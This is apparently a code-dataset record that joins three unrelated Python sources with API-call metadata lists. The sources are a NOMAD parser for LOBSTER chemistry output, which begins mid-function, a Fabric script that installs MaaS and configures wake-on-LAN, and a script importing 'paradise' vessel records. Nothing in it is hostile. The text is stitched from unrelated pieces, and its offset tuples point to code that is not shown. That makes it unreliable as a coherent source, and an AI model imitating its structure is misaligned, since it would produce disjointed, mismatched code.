            section = scc.x_lobster_section_cohp
    pairs = coxpcar_parser.get('coxp_pairs')
    if pairs is None:
        logger.warning('No CO{}P values detected in CO{}PCAR.lobster.'.format(
            method.upper(), method.upper()))
        return
    a1, a2, distances = zip(*pairs)
    number_of_pairs = len(list(a1))
    setattr(section, "x_lobster_number_of_co{}p_pairs".format(
        method), number_of_pairs)
    setattr(section, "x_lobster_co{}p_atom1_labels".format(
        method), list(a1))
    setattr(section, "x_lobster_co{}p_atom2_labels".format(
        method), list(a2))
    setattr(section, "x_lobster_co{}p_distances".format(
        method), np.array(distances) * units.angstrom)
    coxp_lines = coxpcar_parser.get('coxp_lines')
    if coxp_lines is None:
        logger.warning('No CO{}P values detected in CO{}PCAR.lobster.'
                       'The file is likely incomplete'.format(
                           method.upper(), method.upper()))
        return
    coxp_lines = list(zip(*coxp_lines))
    setattr(section, "x_lobster_number_of_co{}p_values".format(
        method), len(coxp_lines[0]))
    setattr(section, "x_lobster_co{}p_energies".format(
        method), np.array(coxp_lines[0]) * units.eV)
    # Column layout: 2N+3 columns for spin-restricted data (energy, average,
    # integrated average, then alternating per-pair value/integral), 4N+5
    # columns when both spin channels are present.
    if len(coxp_lines) == 2 * number_of_pairs + 3:
        coxp = [[x] for x in coxp_lines[3::2]]
        icoxp = [[x] for x in coxp_lines[4::2]]
        acoxp = [coxp_lines[1]]
        aicoxp = [coxp_lines[2]]
    elif len(coxp_lines) == 4 * number_of_pairs + 5:
        coxp = [x for x in zip(coxp_lines[5:number_of_pairs * 2 + 4:2],
                coxp_lines[number_of_pairs * 2 + 5: 4 * number_of_pairs + 4:2])]
        icoxp = [x for x in zip(coxp_lines[6:number_of_pairs * 2 + 5:2],
                 coxp_lines[number_of_pairs * 2 + 6: 4 * number_of_pairs + 5:2])]
        acoxp = [coxp_lines[1], coxp_lines[3]]
        aicoxp = [coxp_lines[2], coxp_lines[4]]
    else:
        logger.warning('Unexpected number of columns {} '
                       'in CO{}PCAR.lobster.'.format(len(coxp_lines),
                                                     method.upper()))
        return
    # FIXME: correct magnitude?
    setattr(section, "x_lobster_co{}p_values".format(
        method), np.array(coxp))
    setattr(section, "x_lobster_average_co{}p_values".format(
        method), np.array(acoxp))
    setattr(section, "x_lobster_integrated_co{}p_values".format(
        method), np.array(icoxp) * units.eV)
    setattr(section, "x_lobster_average_integrated_co{}p_values".format(
        method), np.array(aicoxp) * units.eV)
def parse_CHARGE(fname, scc):
    """Parse CHARGE.lobster and attach Mulliken and Loewdin atomic charges.

    fname: path to CHARGE.lobster (silently skipped if absent)
    scc: calculation section that receives one Charges sub-section per scheme
    """
    parser = TextParser(quantities=[
        Quantity(
            'charges', r'\s*\d+\s+[A-Za-z]{1,2}\s+([-\d\.]+)\s+([-\d\.]+)\s*', repeats=True)
    ])
    if not path.isfile(fname):
        return
    parser.mainfile = fname
    parser.parse()
    charges = parser.get('charges')
    if charges is None:
        return
    # Column 0 holds the Mulliken charges, column 1 the Loewdin charges.
    columns = list(zip(*charges))
    for column, analysis in enumerate(("mulliken", "loewdin")):
        sec_charges = scc.m_create(Charges)
        sec_charges.analysis_method = analysis
        sec_charges.kind = "integrated"
        sec_charges.value = np.array(columns[column]) * units.elementary_charge
def parse_DOSCAR(fname, run, logger):
    """Parse DOSCAR.lobster: total DOS, atom lm-projected DOS and species.

    fname: path to DOSCAR.lobster (silently skipped if absent)
    run: Run section to attach the DOS (and possibly a System) to
    logger: logger used to report malformed or incomplete files

    Fix over the previous version: the lm-projected values were divided by a
    bare, undefined name `eV`; this now uses `units.eV`, consistent with the
    total-DOS branch.
    """
    def parse_species(run, atomic_numbers):
        """
        If we don't have any structure from the underlying DFT code, we can
        at least figure out what atoms we have in the structure. The best place
        to get this info from is the DOSCAR.lobster
        """
        if not run.system:
            system = run.m_create(System)
            system.atoms = Atoms(species=atomic_numbers, periodic=[True, True, True])

    def translate_lm(lm):
        """Map a LOBSTER orbital label (e.g. '2p_x' -> 'p_x') to [l, m]."""
        lm_dictionary = {
            's': [0, 0],
            'p_z': [1, 0],
            'p_x': [1, 1],
            'p_y': [1, 2],
            'd_z^2': [2, 0],
            'd_xz': [2, 1],
            'd_yz': [2, 2],
            'd_xy': [2, 3],
            'd_x^2-y^2': [2, 4],
            'z^3': [3, 0],
            'xz^2': [3, 1],
            'yz^2': [3, 2],
            'xyz': [3, 3],
            'z(x^2-y^2)': [3, 4],
            'x(x^2-3y^2)': [3, 5],
            'y(3x^2-y^2)': [3, 6],
        }
        # lm[0] is the principal quantum number prefix; drop it for lookup.
        return lm_dictionary.get(lm[1:])

    if not path.isfile(fname):
        return
    energies = []
    dos_values = []
    integral_dos = []
    atom_projected_dos_values = []
    atom_index = 0
    n_atoms = 0
    n_dos = 0
    atomic_numbers = []
    lms = []
    with open(fname) as f:
        for i, line in enumerate(f):
            if i == 0:
                n_atoms = int(line.split()[0])
            if i == 1:
                # cell volume; parsed but currently unused
                _ = float(line.split()[0]) * units.angstrom**3
            if i == 5:
                n_dos = int(line.split()[2])
            if 'Z=' in line:
                # Per-atom header line: starts a new projected-DOS block.
                atom_index += 1
                atom_projected_dos_values.append([])
                lms.append((line.split(';')[-1]).split())
                atomic_numbers.append(int(line.split(';')[-2].split('=')[1]))
                continue
            if i > 5:
                line = [float(x) for x in line.split()]
                if atom_index == 0:
                    # Total DOS: 3 columns unpolarized, 5 spin-polarized.
                    energies.append(line[0])
                    if len(line) == 3:
                        dos_values.append([line[1]])
                        integral_dos.append([line[2]])
                    elif len(line) == 5:
                        dos_values.append([line[1], line[2]])
                        integral_dos.append([line[3], line[4]])
                else:
                    atom_projected_dos_values[-1].append(line[1:])
    if len(atomic_numbers) > 0 and len(atomic_numbers) == n_atoms:
        parse_species(run, atomic_numbers)
    if n_dos == 0:
        return
    if len(dos_values) == n_dos:
        dos = run.calculation[0].m_create(Dos, Calculation.dos_electronic)
        dos.n_energies = n_dos
        dos.energies = energies * units.eV
        value = list(zip(*dos_values))
        n_electrons = sum(atomic_numbers)
        index = (np.abs(energies)).argmin()
        # integrated dos at the Fermi level should be the number of electrons
        n_valence_electrons = int(round(sum(integral_dos[index])))
        n_core_electrons = n_electrons - n_valence_electrons
        value_integrated = np.array(list(zip(*integral_dos))) + n_core_electrons / len(integral_dos[0])
        for spin_i in range(len(value)):
            dos_total = dos.m_create(DosValues, Dos.total)
            dos_total.spin = spin_i
            dos_total.value = value[spin_i] * (1 / units.eV)
            dos_total.value_integrated = value_integrated[spin_i]
    else:
        logger.warning('Unable to parse total dos from DOSCAR.lobster, \
it doesn\'t contain enough dos values')
        return
    for atom_i, pdos in enumerate(atom_projected_dos_values):
        if len(pdos) != n_dos:
            logger.warning('Unable to parse atom lm-projected dos from DOSCAR.lobster, \
it doesn\'t contain enough dos values')
            continue
        if len(lms[atom_i]) == len(pdos[0]):
            # we have the same lm-projections for spin up and dn
            dos_values = np.array([[lmdos] for lmdos in zip(*pdos)]) / units.eV
        elif len(lms[atom_i]) * 2 == len(pdos[0]):
            # Alternating up/dn columns per lm channel.
            pdos_up = list(zip(*pdos))[0::2]
            pdos_dn = list(zip(*pdos))[1::2]
            dos_values = np.array([[a, b] for a, b in zip(pdos_up, pdos_dn)]) / units.eV
        else:
            logger.warning('Unexpected number of columns in DOSCAR.lobster')
            return
        for lm_i, lm in enumerate(lms[atom_i]):
            for spin_i in range(len(dos_values[lm_i])):
                section_pdos = dos.m_create(DosValues, Dos.atom_projected)
                section_pdos.atom_index = atom_i
                section_pdos.spin = spin_i
                section_pdos.m_kind = 'real_orbital'
                section_pdos.lm = translate_lm(lm)
                section_pdos.value = dos_values[lm_i][spin_i]
# Parser for the main lobster.out file: program version, start date, the
# DFT code that produced the wavefunctions, the local basis functions and
# the charge-spilling diagnostics (one block per spin channel).
mainfile_parser = TextParser(quantities=[
    Quantity('program_version', r'^LOBSTER\s*v([\d\.]+)\s*', repeats=False),
    Quantity('datetime', r'starting on host \S* on (\d{4}-\d\d-\d\d\sat\s\d\d:\d\d:\d\d)\s[A-Z]{3,4}',
             repeats=False),
    Quantity('x_lobster_code',
             r'detecting used PAW program... (.*)', repeats=False),
    Quantity('x_lobster_basis',
             r'setting up local basis functions...\s*((?:[a-zA-Z]{1,2}\s+\(.+\)(?:\s+\d\S+)+\s+)+)',
             repeats=False,
             sub_parser=TextParser(quantities=[
                 Quantity('x_lobster_basis_species',
                          r'([a-zA-Z]+){1,2}\s+\((.+)\)((?:\s+\d\S+)+)\s+', repeats=True)
             ])),
    Quantity('spilling', r'((?:spillings|abs. tot)[\s\S]*?charge\s*spilling:\s*\d+\.\d+%)',
             repeats=True,
             sub_parser=TextParser(quantities=[
                 Quantity('abs_total_spilling',
                          r'abs.\s*total\s*spilling:\s*(\d+\.\d+)%', repeats=False),
                 Quantity('abs_charge_spilling',
                          r'abs.\s*charge\s*spilling:\s*(\d+\.\d+)%', repeats=False)
             ])),
    Quantity('finished', r'finished in (\d)', repeats=False),
])
class LobsterParser:
    """NOMAD entry parser for LOBSTER output.

    Parses lobster.out plus the auxiliary files living next to it
    (ICO{H,O}PLIST, CO{H,O}PCAR, CHARGE, DOSCAR) into an EntryArchive.
    """
    def __init__(self):
        pass
    def parse(self, mainfile: str, archive: EntryArchive, logger=None):
        """Parse `mainfile` (lobster.out) and its sibling files into `archive`."""
        mainfile_parser.mainfile = mainfile
        mainfile_path = path.dirname(mainfile)
        mainfile_parser.parse()
        run = archive.m_create(Run)
        run.program = Program(
            name='LOBSTER',
            version=str(mainfile_parser.get('program_version')))
        # FIXME: There is a timezone info present as well, but datetime support for timezones
        # is bad and it doesn't support some timezones (for example CEST).
        # That leads to test failures, so ignore it for now.
        date = datetime.datetime.strptime(' '.join(mainfile_parser.get('datetime')),
                                          '%Y-%m-%d at %H:%M:%S') - datetime.datetime(1970, 1, 1)
        run.time_run = TimeRun(wall_start=date.total_seconds())
        code = mainfile_parser.get('x_lobster_code')
        # parse structure
        if code is not None:
            if code == 'VASP':
                try:
                    structure = ase.io.read(mainfile_path + '/CONTCAR', format="vasp")
                except FileNotFoundError:
                    logger.warning('Unable to parse structure info, no CONTCAR detected')
            else:
                logger.warning('Parsing of {} structure is not supported'.format(code))
        # Only set when the CONTCAR read above succeeded.
        if 'structure' in locals():
            system = run.m_create(System)
            system.atoms = Atoms(
                lattice_vectors=structure.get_cell() * units.angstrom,
                labels=structure.get_chemical_symbols(),
                periodic=structure.get_pbc(),
                positions=structure.get_positions() * units.angstrom)
        if mainfile_parser.get('finished') is not None:
            run.clean_end = True
        else:
            run.clean_end = False
        scc = run.m_create(Calculation)
        method = run.m_create(Method)
        scc.method_ref = method
        spilling = mainfile_parser.get('spilling')
        if spilling is not None:
            # One spilling block per spin channel in lobster.out.
            method.electronic = Electronic(n_spin_channels=len(spilling))
            total_spilling = []
            charge_spilling = []
            for s in spilling:
                total_spilling.append(s.get('abs_total_spilling'))
                charge_spilling.append(s.get('abs_charge_spilling'))
            scc.x_lobster_abs_total_spilling = np.array(total_spilling)
            scc.x_lobster_abs_charge_spilling = np.array(charge_spilling)
        method_keys = [
            'x_lobster_code'
        ]
        for key in method_keys:
            val = mainfile_parser.get(key)
            if val is not None:
                setattr(method, key, val)
        basis = mainfile_parser.get('x_lobster_basis')
        if basis is not None:
            species = basis.get('x_lobster_basis_species')
            if species is not None:
                method.basis_set.append(BasisSet(name=species[0][1]))
        # Auxiliary LOBSTER output files live next to lobster.out.
        parse_ICOXPLIST(mainfile_path + '/ICOHPLIST.lobster', scc, 'h')
        parse_ICOXPLIST(mainfile_path + '/ICOOPLIST.lobster', scc, 'o')
        parse_COXPCAR(mainfile_path + '/COHPCAR.lobster', scc, 'h', logger)
        parse_COXPCAR(mainfile_path + '/COOPCAR.lobster', scc, 'o', logger)
        parse_CHARGE(mainfile_path + '/CHARGE.lobster', scc)
        parse_DOSCAR(mainfile_path + '/DOSCAR.lobster', run, logger)
        if run.system:
            scc.system_ref = run.system[0]
| [
"datetime.datetime",
"numpy.abs",
"nomad.datamodel.metainfo.simulation.method.BasisSet",
"os.path.isfile",
"numpy.array",
"os.path.dirname",
"nomad.datamodel.metainfo.simulation.system.Atoms",
"nomad.parsing.file_parser.Quantity"
] | [((2539, 2557), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (2550, 2557), False, 'from os import path\n'), ((4514, 4532), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (4525, 4532), False, 'from os import path\n'), ((7185, 7199), 'numpy.array', 'np.array', (['coxp'], {}), '(coxp)\n', (7193, 7199), True, 'import numpy as np\n'), ((7280, 7295), 'numpy.array', 'np.array', (['acoxp'], {}), '(acoxp)\n', (7288, 7295), True, 'import numpy as np\n'), ((7842, 7860), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (7853, 7860), False, 'from os import path\n'), ((9504, 9522), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (9515, 9522), False, 'from os import path\n'), ((14707, 14729), 'os.path.dirname', 'path.dirname', (['mainfile'], {}), '(mainfile)\n', (14719, 14729), False, 'from os import path\n'), ((5614, 5633), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (5622, 5633), True, 'import numpy as np\n'), ((6154, 6177), 'numpy.array', 'np.array', (['coxp_lines[0]'], {}), '(coxp_lines[0])\n', (6162, 6177), True, 'import numpy as np\n'), ((7379, 7394), 'numpy.array', 'np.array', (['icoxp'], {}), '(icoxp)\n', (7387, 7394), True, 'import numpy as np\n'), ((7497, 7513), 'numpy.array', 'np.array', (['aicoxp'], {}), '(aicoxp)\n', (7505, 7513), True, 'import numpy as np\n'), ((7608, 7623), 'numpy.array', 'np.array', (['icoxp'], {}), '(icoxp)\n', (7616, 7623), True, 'import numpy as np\n'), ((8863, 8921), 'nomad.datamodel.metainfo.simulation.system.Atoms', 'Atoms', ([], {'species': 'atomic_numbers', 'periodic': '[True, True, True]'}), '(species=atomic_numbers, periodic=[True, True, True])\n', (8868, 8921), False, 'from nomad.datamodel.metainfo.simulation.system import System, Atoms\n'), ((13315, 13389), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""program_version"""', '"""^LOBSTER\\\\s*v([\\\\d\\\\.]+)\\\\s*"""'], {'repeats': '(False)'}), "('program_version', 
'^LOBSTER\\\\s*v([\\\\d\\\\.]+)\\\\s*', repeats=False)\n", (13323, 13389), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((13392, 13528), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""datetime"""', '"""starting on host \\\\S* on (\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d\\\\sat\\\\s\\\\d\\\\d:\\\\d\\\\d:\\\\d\\\\d)\\\\s[A-Z]{3,4}"""'], {'repeats': '(False)'}), "('datetime',\n 'starting on host \\\\S* on (\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d\\\\sat\\\\s\\\\d\\\\d:\\\\d\\\\d:\\\\d\\\\d)\\\\s[A-Z]{3,4}'\n , repeats=False)\n", (13400, 13528), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((13524, 13603), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""x_lobster_code"""', '"""detecting used PAW program... (.*)"""'], {'repeats': '(False)'}), "('x_lobster_code', 'detecting used PAW program... (.*)', repeats=False)\n", (13532, 13603), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((14445, 14501), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""finished"""', '"""finished in (\\\\d)"""'], {'repeats': '(False)'}), "('finished', 'finished in (\\\\d)', repeats=False)\n", (14453, 14501), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((15307, 15336), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (15324, 15336), False, 'import datetime\n'), ((16930, 16954), 'numpy.array', 'np.array', (['total_spilling'], {}), '(total_spilling)\n', (16938, 16954), True, 'import numpy as np\n'), ((17003, 17028), 'numpy.array', 'np.array', (['charge_spilling'], {}), '(charge_spilling)\n', (17011, 17028), True, 'import numpy as np\n'), ((4149, 4164), 'numpy.array', 'np.array', (['icoxp'], {}), '(icoxp)\n', (4157, 4164), True, 'import numpy as np\n'), ((4279, 4389), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""coxp_pairs"""', '"""No\\\\.\\\\d+:(\\\\w{1,2}\\\\d+)->(\\\\w{1,2}\\\\d+)\\\\(([\\\\d\\\\.]+)\\\\)\\\\s*?"""'], {'repeats': 
'(True)'}), "('coxp_pairs',\n 'No\\\\.\\\\d+:(\\\\w{1,2}\\\\d+)->(\\\\w{1,2}\\\\d+)\\\\(([\\\\d\\\\.]+)\\\\)\\\\s*?',\n repeats=True)\n", (4287, 4389), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((4398, 4489), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""coxp_lines"""', '"""\\\\n\\\\s*(-*\\\\d+\\\\.\\\\d+(?:[ \\\\t]+-*\\\\d+\\\\.\\\\d+)+)"""'], {'repeats': '(True)'}), "('coxp_lines', '\\\\n\\\\s*(-*\\\\d+\\\\.\\\\d+(?:[ \\\\t]+-*\\\\d+\\\\.\\\\d+)+)',\n repeats=True)\n", (4406, 4489), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((7720, 7826), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""charges"""', '"""\\\\s*\\\\d+\\\\s+[A-Za-z]{1,2}\\\\s+([-\\\\d\\\\.]+)\\\\s+([-\\\\d\\\\.]+)\\\\s*"""'], {'repeats': '(True)'}), "('charges',\n '\\\\s*\\\\d+\\\\s+[A-Za-z]{1,2}\\\\s+([-\\\\d\\\\.]+)\\\\s+([-\\\\d\\\\.]+)\\\\s*',\n repeats=True)\n", (7728, 7826), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((11273, 11289), 'numpy.abs', 'np.abs', (['energies'], {}), '(energies)\n', (11279, 11289), True, 'import numpy as np\n'), ((3654, 3673), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (3662, 3673), True, 'import numpy as np\n'), ((17464, 17492), 'nomad.datamodel.metainfo.simulation.method.BasisSet', 'BasisSet', ([], {'name': 'species[0][1]'}), '(name=species[0][1])\n', (17472, 17492), False, 'from nomad.datamodel.metainfo.simulation.method import Method, Electronic, BasisSet\n'), ((13845, 13954), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""x_lobster_basis_species"""', '"""([a-zA-Z]+){1,2}\\\\s+\\\\((.+)\\\\)((?:\\\\s+\\\\d\\\\S+)+)\\\\s+"""'], {'repeats': '(True)'}), "('x_lobster_basis_species',\n '([a-zA-Z]+){1,2}\\\\s+\\\\((.+)\\\\)((?:\\\\s+\\\\d\\\\S+)+)\\\\s+', repeats=True)\n", (13853, 13954), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((14173, 14270), 'nomad.parsing.file_parser.Quantity', 'Quantity', 
(['"""abs_total_spilling"""', '"""abs.\\\\s*total\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%"""'], {'repeats': '(False)'}), "('abs_total_spilling',\n 'abs.\\\\s*total\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%', repeats=False)\n", (14181, 14270), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((14306, 14405), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""abs_charge_spilling"""', '"""abs.\\\\s*charge\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%"""'], {'repeats': '(False)'}), "('abs_charge_spilling',\n 'abs.\\\\s*charge\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%', repeats=False)\n", (14314, 14405), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((2096, 2329), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""line"""', '"""(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s*)|(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s+[\\\\d]+\\\\s*)"""'], {'repeats': '(True)', 'str_operation': 'icoxp_line_split'}), "('line',\n '(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s*)|(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s+[\\\\d]+\\\\s*)'\n , repeats=True, str_operation=icoxp_line_split)\n", (2104, 2329), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n')] |
##
# Fabric module to deploy MaaS. Run as root user.
#
import os
import sys
import time
import logging
from fabric.api import *
from fabric.operations import reboot
from fabric.colors import cyan, green, red
from fabric.context_managers import shell_env
from fabric.contrib.files import append, sed, comment
from fabric.decorators import hosts, parallel, serial
# Silence everything below ERROR, in particular paramiko's chatty transport log.
logging.basicConfig(level=logging.ERROR)
para_log = logging.getLogger('paramiko.transport')
para_log.setLevel(logging.ERROR)
# Fabric role definitions; replace the placeholder with the real controller host.
env.roledefs = { 'controller' : ['hostname@ipaddress'] }
@roles('controller')
def install_maas():
    """Installs MaaS on a remote machine and configures wake-on-LAN.

    Prompts interactively for the ethernet device used by etherwake and
    re-asks until the user answers 'y' (configure) or 'n' (skip).

    Fix over the previous version: the loop condition used
    `answer != 'y' or answer != 'n'`, which is always true, so an
    unrecognized answer fell straight through to the skip branch instead
    of re-prompting.
    """
    sudo('add-apt-repository ppa:maas-maintainers/stable')
    sudo('apt-get update')
    sudo('apt-get install -y maas maas-dhcp maas-dns')
    path_to_configs = '/home/user/maas'
    # Keep asking until we get an explicit y/n; 'n' skips the wakeonlan setup.
    answer = 'unknown'
    while answer not in ('y', 'n'):
        eth_name = raw_input("Please specify ethernet device name for wakeonlan: ")
        print(cyan('Ethernet device for wakeonlan is set to: ' + eth_name))
        answer = raw_input("Correct? [y/n]:")
    if answer == 'y':
        # Point the etherwake power template at the chosen interface.
        put(path_to_configs + '/ether_wake.template', '/tmp/ether_wake.template')
        config_file = '/tmp/ether_wake.template'
        searchExp = '/usr/sbin/etherwake \$mac_address'
        replaceExp = 'sudo /usr/sbin/etherwake -i ' + eth_name + ' \$mac_address'
        sed(config_file, searchExp, replaceExp)
        sudo('mv /tmp/ether_wake.template /etc/maas/templates/power/ether_wake.template')
        run('rm -rf ' + config_file + '.bak')
        # Allow the maas user to run etherwake without a password.
        put(path_to_configs + '/99-maas-sudoers', '/tmp/99-maas-sudoers')
        config_file = '/tmp/99-maas-sudoers'
        text = 'maas ALL= NOPASSWD: /usr/sbin/etherwake'
        append(config_file, text, use_sudo=True, partial=True, escape=True, shell=False)
        sudo('mv /tmp/99-maas-sudoers /etc/sudoers.d/99-maas-sudoers')
        run('rm -rf ' + config_file + '.bak')
        print(green('Wakeonlan configured. Maas is installed properly.'))
    else:
        print(green('Maas is installed properly.'))
        print(red('Alert: Didn\'t setup wakeonlan. Hit possibility of not being able to do wakeonlan properly.\nPlease do manual configuration!'))
    return
| [
"logging.basicConfig",
"logging.getLogger",
"fabric.colors.green",
"fabric.colors.red",
"fabric.contrib.files.sed",
"fabric.contrib.files.append",
"fabric.colors.cyan"
] | [((365, 405), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.ERROR'}), '(level=logging.ERROR)\n', (384, 405), False, 'import logging\n'), ((417, 456), 'logging.getLogger', 'logging.getLogger', (['"""paramiko.transport"""'], {}), "('paramiko.transport')\n", (434, 456), False, 'import logging\n'), ((946, 1006), 'fabric.colors.cyan', 'cyan', (["('Ethernet device for wakeonlan is set to: ' + eth_name)"], {}), "('Ethernet device for wakeonlan is set to: ' + eth_name)\n", (950, 1006), False, 'from fabric.colors import cyan, green, red\n'), ((1320, 1359), 'fabric.contrib.files.sed', 'sed', (['config_file', 'searchExp', 'replaceExp'], {}), '(config_file, searchExp, replaceExp)\n', (1323, 1359), False, 'from fabric.contrib.files import append, sed, comment\n'), ((1650, 1735), 'fabric.contrib.files.append', 'append', (['config_file', 'text'], {'use_sudo': '(True)', 'partial': '(True)', 'escape': '(True)', 'shell': '(False)'}), '(config_file, text, use_sudo=True, partial=True, escape=True, shell=False\n )\n', (1656, 1735), False, 'from fabric.contrib.files import append, sed, comment\n'), ((1847, 1905), 'fabric.colors.green', 'green', (['"""Wakeonlan configured. Maas is installed properly."""'], {}), "('Wakeonlan configured. Maas is installed properly.')\n", (1852, 1905), False, 'from fabric.colors import cyan, green, red\n'), ((1934, 1970), 'fabric.colors.green', 'green', (['"""Maas is installed properly."""'], {}), "('Maas is installed properly.')\n", (1939, 1970), False, 'from fabric.colors import cyan, green, red\n'), ((1981, 2119), 'fabric.colors.red', 'red', (['"""Alert: Didn\'t setup wakeonlan. Hit possibility of not being able to do wakeonlan properly.\nPlease do manual configuration!"""'], {}), '("""Alert: Didn\'t setup wakeonlan. Hit possibility of not being able to do wakeonlan properly.\nPlease do manual configuration!"""\n )\n', (1984, 2119), False, 'from fabric.colors import cyan, green, red\n')] |
import re
from dateutil.parser import parse
from vessel import Vessel,Forum,InvalidVesselException,engine,session
from tqdm import tqdm
import urllib.request
import codecs
# Mapping from the paradise "((program))" vocabulary to equivalent jinja
# expressions; used by to_jinja() to rewrite vessel notes.
program_to_jinja={
    "children count": "vessel.children|length",
    "children random":"(vessel.children|random).name",
    "children list":"('\n - '~(vessel.children|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if vessel.children",
    "paradise paradoxes":"('\n - '~(atlas|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if atlas",
    "paradise spells":"('\n - '~(spells|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if spells",
    "paradise tunnels":"('\n - '~(tunnels|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if tunnels",
    "paradise count":"universe|length",
    "siblings count":"vessel.siblings|length",
    "siblings random":"(vessel.siblings|random).name",
    "siblings list":"('\n - '~(vessel.siblings|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if vessel.siblings",
    "time day":"time.day",
    "time year":"time.year",
    "time month":"time.month",
    "time clock":"time.clock",
    "time date":"time.date",
    "time above":"time.above",
    "time below":"time.below",
    "vessel id":"vessel.id",
    "vessel name":"vessel.name",
    "vessel parent id":"vessel.parent.id",
    "vessel parent name":"vessel.parent.name",
    "vessel stem id":"vessel.stem.id",
    "vessel stem name":"vessel.stem.name",
    "vessel random id":"vessel.random.id",
    "vessel random name":"vessel.random.name",
    #"random":"",
    }
def parse_memory_array(data):
    """Yield one dict per record line of a fixed-width .ma memory file.

    A header line starting with "@ " names the columns and fixes their
    character spans; every later non-blank, non-comment ("~") line is sliced
    by those spans and yielded as {column_name: stripped_value}.

    Fixes over the previous version: raw string for the regex (the old
    "(\\w+)\\s*" literal relied on invalid escape sequences) and no more
    shadowing of the `data` parameter inside the loop.
    """
    value_slices = []
    for line in data.splitlines():
        if not line.strip():
            continue
        if line.startswith("~"):  # comment line
            continue
        if line.startswith("@ "):
            # Header: derive one slice per column from the label positions.
            header = line.strip("@ ")
            first_word = header.split()[0]
            # Widen the first column to compensate for the stripped "@ " prefix.
            header = header.replace(first_word, first_word + " ")
            for match in re.finditer(r"(\w+)\s*", header):
                value_slices.append((match.groups()[0].lower(), list(match.span())))
            # The last column extends to the end of each record line.
            value_slices[-1][1][1] = None
            value_slices = {name: slice(*span) for name, span in value_slices}
        else:
            yield {name: line[span].strip()
                   for name, span in value_slices.items()}
def to_jinja(code):
    """Translate a paradise ((program)) snippet into jinja template syntax."""
    if not code or "((" not in code or "))" not in code:
        return code
    # Text between the first "((" and the following "))".
    inner = code.split("((")[1].split("))")[0].strip()
    if inner in program_to_jinja:
        code = code.replace(inner, " {} ".format(program_to_jinja[inner]))
    # Swap the paradise delimiters for the custom jinja ones.
    return code.replace("((", "<( ").replace("))", " )>")
# Rebuild the database schema from scratch before importing.
Vessel.metadata.drop_all(engine)
Vessel.metadata.create_all(engine)
vessel_url="https://raw.githubusercontent.com/XXIIVV/vessel.paradise/master/memory/paradise.ma"
vessels=str(urllib.request.urlopen(vessel_url).read(),"utf-8")
dropped=0
print("Importing Vessels...")
for id_val,record in enumerate(tqdm(list(parse_memory_array(vessels)),ascii=True,disable=False)):
    record['id']=id_val
    # The CODE column packs state flags, parent id, owner id and creation date.
    state,parent,owner,created=record['code'].split("-")
    record['parent_id']=int(parent.lstrip("0") or "0")
    record['owner_id']=int(owner.lstrip("0") or "0")
    record['created_raw']=created.lstrip("0") or None
    if record['created_raw']:
        record['created_raw']=parse(record['created_raw'])
    # Four "0"/"1" digits: locked/hidden/silent/tunnel.
    state={attr:val=="1" for attr,val in zip(("locked","hidden","silent","tunnel"),state)}
    record.update(state)
    del record['code']
    record['raw_note']=record['note']
    del record['note']
    # Convert legacy ((program)) syntax in all string fields to jinja.
    for k,v in record.items():
        if isinstance(v,str):
            record[k]=to_jinja(v)
    if not record['name']:
        record['name']="nullspace"
    try:
        # Construct unlocked, then restore the original flag
        # (presumably to bypass creation-time lock checks — verify).
        orig_locked=record['locked']
        record['locked']=False
        Vessel(**record).locked=orig_locked
    except InvalidVesselException as e:
        dropped+=1
